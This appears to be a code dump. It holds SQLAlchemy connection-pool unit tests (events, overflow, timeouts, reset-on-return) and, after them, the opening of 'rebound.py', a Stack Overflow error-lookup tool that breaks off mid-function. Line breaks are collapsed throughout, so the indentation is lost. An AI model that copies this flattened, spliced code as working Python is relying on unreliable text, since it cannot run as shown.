eq_(canary, ['connect']) def test_connect_event_fires_subsequent(self): p, canary = self._connect_event_fixture() c1 = p.connect() c2 = p.connect() eq_(canary, ['connect', 'connect']) def test_connect_on_previously_recreated(self): p, canary = self._connect_event_fixture() p2 = p.recreate() c1 = p.connect() c2 = p2.connect() eq_(canary, ['connect', 'connect']) def test_connect_on_subsequently_recreated(self): p, canary = self._connect_event_fixture() c1 = p.connect() p2 = p.recreate() c2 = p2.connect() eq_(canary, ['connect', 'connect']) def test_checkout_event(self): p, canary = self._checkout_event_fixture() c1 = p.connect() eq_(canary, ['checkout']) def test_checkout_event_fires_subsequent(self): p, canary = self._checkout_event_fixture() c1 = p.connect() c2 = p.connect() eq_(canary, ['checkout', 'checkout']) def test_checkout_event_on_subsequently_recreated(self): p, canary = self._checkout_event_fixture() c1 = p.connect() p2 = p.recreate() c2 = p2.connect() eq_(canary, ['checkout', 'checkout']) def test_checkin_event(self): p, canary = self._checkin_event_fixture() c1 = p.connect() eq_(canary, []) c1.close() eq_(canary, ['checkin']) def test_reset_event(self): p, canary = self._reset_event_fixture() c1 = p.connect() eq_(canary, []) c1.close() eq_(canary, ['reset']) def test_invalidate_event_no_exception(self): p, canary = self._invalidate_event_fixture() c1 = p.connect() c1.close() assert not canary.called c1 = p.connect() dbapi_con = c1.connection c1.invalidate() assert canary.call_args_list[0][0][0] is dbapi_con assert canary.call_args_list[0][0][2] is None def test_invalidate_event_exception(self): p, canary = self._invalidate_event_fixture() c1 = p.connect() c1.close() assert not canary.called c1 = p.connect() dbapi_con = c1.connection exc = Exception("hi") c1.invalidate(exc) assert canary.call_args_list[0][0][0] is dbapi_con assert canary.call_args_list[0][0][2] is exc def test_checkin_event_gc(self): p, canary = self._checkin_event_fixture() c1 = p.connect() eq_(canary, []) del c1 lazy_gc() eq_(canary, ['checkin']) def test_checkin_event_on_subsequently_recreated(self): p, canary = self._checkin_event_fixture() c1 = p.connect() p2 = p.recreate() c2 = p2.connect() eq_(canary, []) c1.close() eq_(canary, ['checkin']) c2.close() eq_(canary, ['checkin', 'checkin']) def test_listen_targets_scope(self): canary = [] def listen_one(*args): canary.append("listen_one") def listen_two(*args): canary.append("listen_two") def listen_three(*args): canary.append("listen_three") def listen_four(*args): canary.append("listen_four") engine = testing_engine(testing.db.url) event.listen(pool.Pool, 'connect', listen_one) event.listen(engine.pool, 'connect', listen_two) event.listen(engine, 'connect', listen_three) event.listen(engine.__class__, 'connect', listen_four) engine.execute(select([1])).close() eq_( canary, ["listen_one", "listen_four", "listen_two", "listen_three"] ) def test_listen_targets_per_subclass(self): """test that listen() called on a subclass remains specific to that subclass.""" canary = [] def listen_one(*args): canary.append("listen_one") def listen_two(*args): canary.append("listen_two") def listen_three(*args): canary.append("listen_three") event.listen(pool.Pool, 'connect', listen_one) event.listen(pool.QueuePool, 'connect', listen_two) event.listen(pool.SingletonThreadPool, 'connect', listen_three) p1 = pool.QueuePool(creator=MockDBAPI().connect) p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect) assert listen_one in p1.dispatch.connect assert listen_two in p1.dispatch.connect assert listen_three not in p1.dispatch.connect assert listen_one in p2.dispatch.connect assert listen_two not in p2.dispatch.connect assert listen_three in p2.dispatch.connect p1.connect() eq_(canary, ["listen_one", "listen_two"]) p2.connect() eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"]) def teardown(self): # TODO: need to get remove() functionality # going pool.Pool.dispatch._clear() class PoolFirstConnectSyncTest(PoolTestBase): # test [ticket:2964] def test_sync(self): pool = self._queuepool_fixture(pool_size=3, max_overflow=0) evt = Mock() @event.listens_for(pool, 'first_connect') def slow_first_connect(dbapi_con, rec): time.sleep(1) evt.first_connect() @event.listens_for(pool, 'connect') def on_connect(dbapi_con, rec): evt.connect() def checkout(): for j in range(2): c1 = pool.connect() time.sleep(.02) c1.close() time.sleep(.02) threads = [] for i in range(5): th = threading.Thread(target=checkout) th.start() threads.append(th) for th in threads: th.join(join_timeout) eq_(evt.mock_calls, [call.first_connect(), call.connect(), call.connect(), call.connect()] ) class DeprecatedPoolListenerTest(PoolTestBase): @testing.requires.predictable_gc @testing.uses_deprecated(r".*Use event.listen") def test_listeners(self): class InstrumentingListener(object): def __init__(self): if hasattr(self, 'connect'): self.connect = self.inst_connect if hasattr(self, 'first_connect'): self.first_connect = self.inst_first_connect if hasattr(self, 'checkout'): self.checkout = self.inst_checkout if hasattr(self, 'checkin'): self.checkin = self.inst_checkin self.clear() def clear(self): self.connected = [] self.first_connected = [] self.checked_out = [] self.checked_in = [] def assert_total(innerself, conn, fconn, cout, cin): eq_(len(innerself.connected), conn) eq_(len(innerself.first_connected), fconn) eq_(len(innerself.checked_out), cout) eq_(len(innerself.checked_in), cin) def assert_in(innerself, item, in_conn, in_fconn, in_cout, in_cin): self.assert_((item in innerself.connected) == in_conn) self.assert_((item in innerself.first_connected) == in_fconn) self.assert_((item in innerself.checked_out) == in_cout) self.assert_((item in innerself.checked_in) == in_cin) def inst_connect(self, con, record): print("connect(%s, %s)" % (con, record)) assert con is not None assert record is not None self.connected.append(con) def inst_first_connect(self, con, record): print("first_connect(%s, %s)" % (con, record)) assert con is not None assert record is not None self.first_connected.append(con) def inst_checkout(self, con, record, proxy): print("checkout(%s, %s, %s)" % (con, record, proxy)) assert con is not None assert record is not None assert proxy is not None self.checked_out.append(con) def inst_checkin(self, con, record): print("checkin(%s, %s)" % (con, record)) # con can be None if invalidated assert record is not None self.checked_in.append(con) class ListenAll(tsa.interfaces.PoolListener, InstrumentingListener): pass class ListenConnect(InstrumentingListener): def connect(self, con, record): pass class ListenFirstConnect(InstrumentingListener): def first_connect(self, con, record): pass class ListenCheckOut(InstrumentingListener): def checkout(self, con, record, proxy, num): pass class ListenCheckIn(InstrumentingListener): def checkin(self, con, record): pass def assert_listeners(p, total, conn, fconn, cout, cin): for instance in (p, p.recreate()): self.assert_(len(instance.dispatch.connect) == conn) self.assert_(len(instance.dispatch.first_connect) == fconn) self.assert_(len(instance.dispatch.checkout) == cout) self.assert_(len(instance.dispatch.checkin) == cin) p = self._queuepool_fixture() assert_listeners(p, 0, 0, 0, 0, 0) p.add_listener(ListenAll()) assert_listeners(p, 1, 1, 1, 1, 1) p.add_listener(ListenConnect()) assert_listeners(p, 2, 2, 1, 1, 1) p.add_listener(ListenFirstConnect()) assert_listeners(p, 3, 2, 2, 1, 1) p.add_listener(ListenCheckOut()) assert_listeners(p, 4, 2, 2, 2, 1) p.add_listener(ListenCheckIn()) assert_listeners(p, 5, 2, 2, 2, 2) del p snoop = ListenAll() p = self._queuepool_fixture(listeners=[snoop]) assert_listeners(p, 1, 1, 1, 1, 1) c = p.connect() snoop.assert_total(1, 1, 1, 0) cc = c.connection snoop.assert_in(cc, True, True, True, False) c.close() snoop.assert_in(cc, True, True, True, True) del c, cc snoop.clear() # this one depends on immediate gc c = p.connect() cc = c.connection snoop.assert_in(cc, False, False, True, False) snoop.assert_total(0, 0, 1, 0) del c, cc lazy_gc() snoop.assert_total(0, 0, 1, 1) p.dispose() snoop.clear() c = p.connect() c.close() c = p.connect() snoop.assert_total(1, 0, 2, 1) c.close() snoop.assert_total(1, 0, 2, 2) # invalidation p.dispose() snoop.clear() c = p.connect() snoop.assert_total(1, 0, 1, 0) c.invalidate() snoop.assert_total(1, 0, 1, 1) c.close() snoop.assert_total(1, 0, 1, 1) del c lazy_gc() snoop.assert_total(1, 0, 1, 1) c = p.connect() snoop.assert_total(2, 0, 2, 1) c.close() del c lazy_gc() snoop.assert_total(2, 0, 2, 2) # detached p.dispose() snoop.clear() c = p.connect() snoop.assert_total(1, 0, 1, 0) c.detach() snoop.assert_total(1, 0, 1, 0) c.close() del c snoop.assert_total(1, 0, 1, 0) c = p.connect() snoop.assert_total(2, 0, 2, 0) c.close() del c snoop.assert_total(2, 0, 2, 1) # recreated p = p.recreate() snoop.clear() c = p.connect() snoop.assert_total(1, 1, 1, 0) c.close() snoop.assert_total(1, 1, 1, 1) c = p.connect() snoop.assert_total(1, 1, 2, 1) c.close() snoop.assert_total(1, 1, 2, 2) @testing.uses_deprecated(r".*Use event.listen") def test_listeners_callables(self): def connect(dbapi_con, con_record): counts[0] += 1 def checkout(dbapi_con, con_record, con_proxy): counts[1] += 1 def checkin(dbapi_con, con_record): counts[2] += 1 i_all = dict(connect=connect, checkout=checkout, checkin=checkin) i_connect = dict(connect=connect) i_checkout = dict(checkout=checkout) i_checkin = dict(checkin=checkin) for cls in (pool.QueuePool, pool.StaticPool): counts = [0, 0, 0] def assert_listeners(p, total, conn, cout, cin): for instance in (p, p.recreate()): eq_(len(instance.dispatch.connect), conn) eq_(len(instance.dispatch.checkout), cout) eq_(len(instance.dispatch.checkin), cin) p = self._queuepool_fixture() assert_listeners(p, 0, 0, 0, 0) p.add_listener(i_all) assert_listeners(p, 1, 1, 1, 1) p.add_listener(i_connect) assert_listeners(p, 2, 1, 1, 1) p.add_listener(i_checkout) assert_listeners(p, 3, 1, 1, 1) p.add_listener(i_checkin) assert_listeners(p, 4, 1, 1, 1) del p p = self._queuepool_fixture(listeners=[i_all]) assert_listeners(p, 1, 1, 1, 1) c = p.connect() assert counts == [1, 1, 0] c.close() assert counts == [1, 1, 1] c = p.connect() assert counts == [1, 2, 1] p.add_listener(i_checkin) c.close() assert counts == [1, 2, 2] class QueuePoolTest(PoolTestBase): def testqueuepool_del(self): self._do_testqueuepool(useclose=False) def testqueuepool_close(self): self._do_testqueuepool(useclose=True) def _do_testqueuepool(self, useclose=False): p = self._queuepool_fixture(pool_size=3, max_overflow=-1) def status(pool): tup = pool.size(), pool.checkedin(), pool.overflow(), \ pool.checkedout() print('Pool size: %d Connections in pool: %d Current '\ 'Overflow: %d Current Checked out connections: %d' % tup) return tup c1 = p.connect() self.assert_(status(p) == (3, 0, -2, 1)) c2 = p.connect() self.assert_(status(p) == (3, 0, -1, 2)) c3 = p.connect() self.assert_(status(p) == (3, 0, 0, 3)) c4 = p.connect() self.assert_(status(p) == (3, 0, 1, 4)) c5 = p.connect() self.assert_(status(p) == (3, 0, 2, 5)) c6 = p.connect() self.assert_(status(p) == (3, 0, 3, 6)) if useclose: c4.close() c3.close() c2.close() else: c4 = c3 = c2 = None lazy_gc() self.assert_(status(p) == (3, 3, 3, 3)) if useclose: c1.close() c5.close() c6.close() else: c1 = c5 = c6 = None lazy_gc() self.assert_(status(p) == (3, 3, 0, 0)) c1 = p.connect() c2 = p.connect() self.assert_(status(p) == (3, 1, 0, 2), status(p)) if useclose: c2.close() else: c2 = None lazy_gc() self.assert_(status(p) == (3, 2, 0, 1)) c1.close() lazy_gc() assert not pool._refs def test_timeout(self): p = self._queuepool_fixture(pool_size=3, max_overflow=0, timeout=2) c1 = p.connect() c2 = p.connect() c3 = p.connect() now = time.time() try: c4 = p.connect() assert False except tsa.exc.TimeoutError: assert int(time.time() - now) == 2 @testing.requires.threading_with_mock def test_timeout_race(self): # test a race condition where the initial connecting threads all race # to queue.Empty, then block on the mutex. each thread consumes a # connection as they go in. when the limit is reached, the remaining # threads go in, and get TimeoutError; even though they never got to # wait for the timeout on queue.get(). the fix involves checking the # timeout again within the mutex, and if so, unlocking and throwing # them back to the start of do_get() dbapi = MockDBAPI() p = pool.QueuePool( creator=lambda: dbapi.connect(delay=.05), pool_size=2, max_overflow=1, use_threadlocal=False, timeout=3) timeouts = [] def checkout(): for x in range(1): now = time.time() try: c1 = p.connect() except tsa.exc.TimeoutError: timeouts.append(time.time() - now) continue time.sleep(4) c1.close() threads = [] for i in range(10): th = threading.Thread(target=checkout) th.start() threads.append(th) for th in threads: th.join(join_timeout) assert len(timeouts) > 0 for t in timeouts: assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts # normally, the timeout should under 4 seconds, # but on a loaded down buildbot it can go up. assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts def _test_overflow(self, thread_count, max_overflow): gc_collect() dbapi = MockDBAPI() def creator(): time.sleep(.05) return dbapi.connect() p = pool.QueuePool(creator=creator, pool_size=3, timeout=2, max_overflow=max_overflow) peaks = [] def whammy(): for i in range(10): try: con = p.connect() time.sleep(.005) peaks.append(p.overflow()) con.close() del con except tsa.exc.TimeoutError: pass threads = [] for i in range(thread_count): th = threading.Thread(target=whammy) th.start() threads.append(th) for th in threads: th.join(join_timeout) self.assert_(max(peaks) <= max_overflow) lazy_gc() assert not pool._refs def test_overflow_reset_on_failed_connect(self): dbapi = Mock() def failing_dbapi(): time.sleep(2) raise Exception("connection failed") creator = dbapi.connect def create(): return creator() p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3) c1 = p.connect() c2 = p.connect() c3 = p.connect() eq_(p._overflow, 1) creator = failing_dbapi assert_raises(Exception, p.connect) eq_(p._overflow, 1) @testing.requires.threading_with_mock def test_hanging_connect_within_overflow(self): """test that a single connect() call which is hanging does not block other connections from proceeding.""" dbapi = Mock() mutex = threading.Lock() def hanging_dbapi(): time.sleep(2) with mutex: return dbapi.connect() def fast_dbapi(): with mutex: return dbapi.connect() creator = threading.local() def create(): return creator.mock_connector() def run_test(name, pool, should_hang): if should_hang: creator.mock_connector = hanging_dbapi else: creator.mock_connector = fast_dbapi conn = pool.connect() conn.operation(name) time.sleep(1) conn.close() p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3) threads = [ threading.Thread( target=run_test, args=("success_one", p, False)), threading.Thread( target=run_test, args=("success_two", p, False)), threading.Thread( target=run_test, args=("overflow_one", p, True)), threading.Thread( target=run_test, args=("overflow_two", p, False)), threading.Thread( target=run_test, args=("overflow_three", p, False)) ] for t in threads: t.start() time.sleep(.2) for t in threads: t.join(timeout=join_timeout) eq_( dbapi.connect().operation.mock_calls, [call("success_one"), call("success_two"), call("overflow_two"), call("overflow_three"), call("overflow_one")] ) @testing.requires.threading_with_mock def test_waiters_handled(self): """test that threads waiting for connections are handled when the pool is replaced. """ mutex = threading.Lock() dbapi = MockDBAPI() def creator(): mutex.acquire() try: return dbapi.connect() finally: mutex.release() success = [] for timeout in (None, 30): for max_overflow in (0, -1, 3): p = pool.QueuePool(creator=creator, pool_size=2, timeout=timeout, max_overflow=max_overflow) def waiter(p, timeout, max_overflow): success_key = (timeout, max_overflow) conn = p.connect() success.append(success_key) time.sleep(.1) conn.close() c1 = p.connect() c2 = p.connect() threads = [] for i in range(2): t = threading.Thread(target=waiter, args=(p, timeout, max_overflow)) t.daemon = True t.start() threads.append(t) # this sleep makes sure that the # two waiter threads hit upon wait() # inside the queue, before we invalidate the other # two conns time.sleep(.2) p2 = p._replace() for t in threads: t.join(join_timeout) eq_(len(success), 12, "successes: %s" % success) @testing.requires.threading_with_mock def test_notify_waiters(self): dbapi = MockDBAPI() canary = [] def creator1(): canary.append(1) return dbapi.connect() def creator2(): canary.append(2) return dbapi.connect() p1 = pool.QueuePool(creator=creator1, pool_size=1, timeout=None, max_overflow=0) p2 = pool.NullPool(creator=creator2) def waiter(p): conn = p.connect() time.sleep(.5) conn.close() c1 = p1.connect() threads = [] for i in range(5): t = threading.Thread(target=waiter, args=(p1, )) t.start() threads.append(t) time.sleep(.5) eq_(canary, [1]) p1._pool.abort(p2) for t in threads: t.join(join_timeout) eq_(canary, [1, 2, 2, 2, 2, 2]) def test_dispose_closes_pooled(self): dbapi = MockDBAPI() p = pool.QueuePool(creator=dbapi.connect, pool_size=2, timeout=None, max_overflow=0) c1 = p.connect() c2 = p.connect() c1_con = c1.connection c2_con = c2.connection c1.close() eq_(c1_con.close.call_count, 0) eq_(c2_con.close.call_count, 0) p.dispose() eq_(c1_con.close.call_count, 1) eq_(c2_con.close.call_count, 0) # currently, if a ConnectionFairy is closed # after the pool has been disposed, there's no # flag that states it should be invalidated # immediately - it just gets returned to the # pool normally... c2.close() eq_(c1_con.close.call_count, 1) eq_(c2_con.close.call_count, 0) # ...and that's the one we'll get back next. c3 = p.connect() assert c3.connection is c2_con @testing.requires.threading_with_mock def test_no_overflow(self): self._test_overflow(40, 0) @testing.requires.threading_with_mock def test_max_overflow(self): self._test_overflow(40, 5) def test_mixed_close(self): pool._refs.clear() p = self._queuepool_fixture(pool_size=3, max_overflow=-1, use_threadlocal=True) c1 = p.connect() c2 = p.connect() assert c1 is c2 c1.close() c2 = None assert p.checkedout() == 1 c1 = None lazy_gc() assert p.checkedout() == 0 lazy_gc() assert not pool._refs def test_overflow_no_gc_tlocal(self): self._test_overflow_no_gc(True) def test_overflow_no_gc(self): self._test_overflow_no_gc(False) def _test_overflow_no_gc(self, threadlocal): p = self._queuepool_fixture(pool_size=2, max_overflow=2) # disable weakref collection of the # underlying connections strong_refs = set() def _conn(): c = p.connect() strong_refs.add(c.connection) return c for j in range(5): # open 4 conns at a time. each time this # will yield two pooled connections + two # overflow connections. conns = [_conn() for i in range(4)] for c in conns: c.close() # doing that for a total of 5 times yields # ten overflow connections closed plus the # two pooled connections unclosed. eq_( set([c.close.call_count for c in strong_refs]), set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0]) ) @testing.requires.predictable_gc def test_weakref_kaboom(self): p = self._queuepool_fixture(pool_size=3, max_overflow=-1, use_threadlocal=True) c1 = p.connect() c2 = p.connect() c1.close() c2 = None del c1 del c2 gc_collect() assert p.checkedout() == 0 c3 = p.connect() assert c3 is not None def test_trick_the_counter(self): """this is a "flaw" in the connection pool; since threadlocal uses a single ConnectionFairy per thread with an open/close counter, you can fool the counter into giving you a ConnectionFairy with an ambiguous counter. i.e. its not true reference counting.""" p = self._queuepool_fixture(pool_size=3, max_overflow=-1, use_threadlocal=True) c1 = p.connect() c2 = p.connect() assert c1 is c2 c1.close() c2 = p.connect() c2.close() self.assert_(p.checkedout() != 0) c2.close() self.assert_(p.checkedout() == 0) def test_recycle(self): p = self._queuepool_fixture(pool_size=1, max_overflow=0, recycle=3) c1 = p.connect() c_id = id(c1.connection) c1.close() c2 = p.connect() assert id(c2.connection) == c_id c2.close() time.sleep(4) c3 = p.connect() assert id(c3.connection) != c_id def _assert_cleanup_on_pooled_reconnect(self, dbapi, p): # p is QueuePool with size=1, max_overflow=2, # and one connection in the pool that will need to # reconnect when next used (either due to recycle or invalidate) eq_(p.checkedout(), 0) eq_(p._overflow, 0) dbapi.shutdown(True) assert_raises( Exception, p.connect ) eq_(p._overflow, 0) eq_(p.checkedout(), 0) # and not 1 dbapi.shutdown(False) c1 = p.connect() assert p._pool.empty() # poolsize is one, so we're empty OK c2 = p.connect() eq_(p._overflow, 1) # and not 2 # this hangs if p._overflow is 2 c3 = p.connect() def test_error_on_pooled_reconnect_cleanup_invalidate(self): dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2) c1 = p.connect() c1.invalidate() c1.close() self._assert_cleanup_on_pooled_reconnect(dbapi, p) def test_error_on_pooled_reconnect_cleanup_recycle(self): dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2, recycle=1) c1 = p.connect() c1.close() time.sleep(1) self._assert_cleanup_on_pooled_reconnect(dbapi, p) def test_invalidate(self): p = self._queuepool_fixture(pool_size=1, max_overflow=0) c1 = p.connect() c_id = c1.connection.id c1.close() c1 = None c1 = p.connect() assert c1.connection.id == c_id c1.invalidate() c1 = None c1 = p.connect() assert c1.connection.id != c_id def test_recreate(self): p = self._queuepool_fixture(reset_on_return=None, pool_size=1, max_overflow=0) p2 = p.recreate() assert p2.size() == 1 assert p2._reset_on_return is pool.reset_none assert p2._use_threadlocal is False assert p2._max_overflow == 0 def test_reconnect(self): """tests reconnect operations at the pool level. SA's engine/dialect includes another layer of reconnect support for 'database was lost' errors.""" dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0) c1 = p.connect() c_id = c1.connection.id c1.close() c1 = None c1 = p.connect() assert c1.connection.id == c_id dbapi.raise_error = True c1.invalidate() c1 = None c1 = p.connect() assert c1.connection.id != c_id def test_detach(self): dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0) c1 = p.connect() c1.detach() c2 = p.connect() eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")]) c1_con = c1.connection assert c1_con is not None eq_(c1_con.close.call_count, 0) c1.close() eq_(c1_con.close.call_count, 1) def test_detach_via_invalidate(self): dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0) c1 = p.connect() c1_con = c1.connection c1.invalidate() assert c1.connection is None eq_(c1_con.close.call_count, 1) c2 = p.connect() assert c2.connection is not c1_con c2_con = c2.connection c2.close() eq_(c2_con.close.call_count, 0) def test_threadfairy(self): p = self._queuepool_fixture(pool_size=3, max_overflow=-1, use_threadlocal=True) c1 = p.connect() c1.close() c2 = p.connect() assert c2.connection is not None class ResetOnReturnTest(PoolTestBase): def _fixture(self, **kw): dbapi = Mock() return dbapi, pool.QueuePool(creator=lambda: dbapi.connect('foo.db'), **kw) def test_plain_rollback(self): dbapi, p = self._fixture(reset_on_return='rollback') c1 = p.connect() c1.close() assert dbapi.connect().rollback.called assert not dbapi.connect().commit.called def test_plain_commit(self): dbapi, p = self._fixture(reset_on_return='commit') c1 = p.connect() c1.close() assert not dbapi.connect().rollback.called assert dbapi.connect().commit.called def test_plain_none(self): dbapi, p = self._fixture(reset_on_return=None) c1 = p.connect() c1.close() assert not dbapi.connect().rollback.called assert not dbapi.connect().commit.called def test_agent_rollback(self): dbapi, p = self._fixture(reset_on_return='rollback') class Agent(object): def __init__(self, conn): self.conn = conn def rollback(self): self.conn.special_rollback() def commit(self): self.conn.special_commit() c1 = p.connect() c1._reset_agent = Agent(c1) c1.close() assert dbapi.connect().special_rollback.called assert not dbapi.connect().special_commit.called assert not dbapi.connect().rollback.called assert not dbapi.connect().commit.called c1 = p.connect() c1.close() eq_(dbapi.connect().special_rollback.call_count, 1) eq_(dbapi.connect().special_commit.call_count, 0) assert dbapi.connect().rollback.called assert not dbapi.connect().commit.called def test_agent_commit(self): dbapi, p = self._fixture(reset_on_return='commit') class Agent(object): def __init__(self, conn): self.conn = conn def rollback(self): self.conn.special_rollback() def commit(self): self.conn.special_commit() c1 = p.connect() c1._reset_agent = Agent(c1) c1.close() assert not dbapi.connect().special_rollback.called assert dbapi.connect().special_commit.called assert not dbapi.connect().rollback.called assert not dbapi.connect().commit.called c1 = p.connect() c1.close() eq_(dbapi.connect().special_rollback.call_count, 0) eq_(dbapi.connect().special_commit.call_count, 1) assert not dbapi.connect().rollback.called assert dbapi.connect().commit.called class SingletonThreadPoolTest(PoolTestBase): @testing.requires.threading_with_mock def test_cleanup(self): self._test_cleanup(False) @testing.requires.threading_with_mock def test_cleanup_no_gc(self): self._test_cleanup(True) def _test_cleanup(self, strong_refs): """test that the pool's connections are OK after cleanup() has been called.""" dbapi = MockDBAPI() lock = threading.Lock() def creator(): # the mock iterator isn't threadsafe... with lock: return dbapi.connect() p = pool.SingletonThreadPool(creator=creator, pool_size=3) if strong_refs: sr = set() def _conn(): c = p.connect() sr.add(c.connection) return c else: def _conn(): return p.connect() def checkout(): for x in range(10): c = _conn() assert c c.cursor() c.close() time.sleep(.1) threads = [] for i in range(10): th = threading.Thread(target=checkout) th.start() threads.append(th) for th in threads: th.join(join_timeout) assert len(p._all_conns) == 3 if strong_refs: still_opened = len([c for c in sr if not c.close.call_count]) eq_(still_opened, 3) class AssertionPoolTest(PoolTestBase): def test_connect_error(self): dbapi = MockDBAPI() p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db')) c1 = p.connect() assert_raises(AssertionError, p.connect) def test_connect_multiple(self): dbapi = MockDBAPI() p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db')) c1 = p.connect() c1.close() c2 = p.connect() c2.close() c3 = p.connect() assert_raises(AssertionError, p.connect) class NullPoolTest(PoolTestBase): def test_reconnect(self): dbapi = MockDBAPI() p = pool.NullPool(creator=lambda: dbapi.connect('foo.db')) c1 = p.connect() c1.close() c1 = None c1 = p.connect() c1.invalidate() c1 = None c1 = p.connect() dbapi.connect.assert_has_calls([ call('foo.db'), call('foo.db')], any_order=True) class StaticPoolTest(PoolTestBase): def test_recreate(self): dbapi = MockDBAPI() creator = lambda: dbapi.connect('foo.db') p = pool.StaticPool(creator) p2 = p.recreate() assert p._creator is p2._creator
rebound.py
########## ## GLOBALS ########## import urwid import re import sys import os from bs4 import BeautifulSoup import requests from queue import Queue from subprocess import PIPE, Popen from threading import Thread import webbrowser import time from urwid.widget import (BOX, FLOW, FIXED) import random SO_URL = "https://stackoverflow.com" # ASCII color codes GREEN = '\033[92m' GRAY = '\033[90m' CYAN = '\033[36m' RED = '\033[31m' YELLOW = '\033[33m' END = '\033[0m' UNDERLINE = '\033[4m' BOLD = '\033[1m' # Scroll actions SCROLL_LINE_UP = "line up" SCROLL_LINE_DOWN = "line down" SCROLL_PAGE_UP = "page up" SCROLL_PAGE_DOWN = "page down" SCROLL_TO_TOP = "to top" SCROLL_TO_END = "to end" # Scrollbar positions SCROLLBAR_LEFT = "left" SCROLLBAR_RIGHT = "right" USER_AGENTS = [ "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)", "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)", "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1", "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0", "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Firefox/59", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20", 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', ] ################## ## FILE ATTRIBUTES ################## def get_language(file_path): """Returns the language a file is written in.""" if file_path.endswith(".py"): return "python3" elif file_path.endswith(".js"): return "node" elif file_path.endswith(".go"): return "go run" elif file_path.endswith(".rb"): return "ruby" elif file_path.endswith(".java"): return 'javac' # Compile Java Source File elif file_path.endswith(".class"): return 'java' # Run Java Class File else: return '' # Unknown language def get_error_message(error, language): """Filters the stack trace from stderr and returns only the error message.""" if error == '': return None elif language == "python3": if any(e in error for e in ["KeyboardInterrupt", "SystemExit", "GeneratorExit"]): # Non-compiler errors return None else: return error.split('\n')[-2].strip() elif language == "node": return error.split('\n')[4][1:] elif language == "go run": return error.split('\n')[1].split(": ", 1)[1][1:] elif language == "ruby": error_message = error.split('\n')[0] return error_message[error_message.rfind(": ") + 2:] elif language == "javac": m = re.search(r'.*error:(.*)', error.split('\n')[0]) return m.group(1) if m else None elif language == "java": for line in 